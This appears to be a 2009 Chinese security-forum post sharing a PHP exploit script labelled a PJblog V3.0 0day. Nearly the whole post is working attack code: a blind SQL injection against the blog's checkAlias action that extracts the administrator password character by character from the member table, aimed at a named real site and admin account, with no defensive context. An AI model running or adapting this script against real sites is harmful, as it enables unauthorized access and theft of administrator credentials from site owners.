Board logo

标题: PJblog V3.0 0day Vbs版漏洞利用工具 [打印本页]

作者: 柔肠寸断    时间: 2009-4-28 12:51     标题: PJblog V3.0 0day Vbs版漏洞利用工具

  1. <?php
  2. /*
  3. PJblog V3.0 0day exp
  4. */

  5. $url="http://www.pjhome.net";    //注入地址
  6. $var_name="puterjam";    //管理员
  7. $var_key="check_right";

  8. if ($_SESSION["LenI"]){
  9. $LenI=$_SESSION["LenI"];
  10. }else{
  11. $LenI=1;
  12. }
  13. for($i=$LenI;$i<=40;$i++){
  14. if($_SESSION["LenDo"]){
  15. $StaAsc=$_SESSION["LenDo"];
  16. }else{
  17. $StaAsc=31;
  18. }
  19. echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127";
  20. for($j=$StaAsc;$j<=127;$j++){
  21. $newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=\''.$var_name.'\'%29%3e'.$j.'%20and%20"1"="1';
  22. $var_pagelen=file_get_contents($newurl);
  23. $var_newpagelen=strpos($var_pagelen,$var_key);
  24. if($var_newpagelen == true){
  25. $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j);
  26. unset($_SESSION["LenDo"]);
  27. $_SESSION["LenI"]=$i+1;
  28. doReload();
  29. break;
  30. }
  31. if($j == $StaAsc+10){
  32. doReload();
  33. break;
  34. }
  35. }
  36. }
  37. if ($_SESSION["LenI"]==40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }

  38. function doReload(){
  39. ?>
  40. <script  language="javascript">
  41. <!--
  42. window.setTimeout('location.reload()',1000);
  43. //-->
  44. </script>
  45. <?php
  46. }
  47. ?>
复制代码





欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2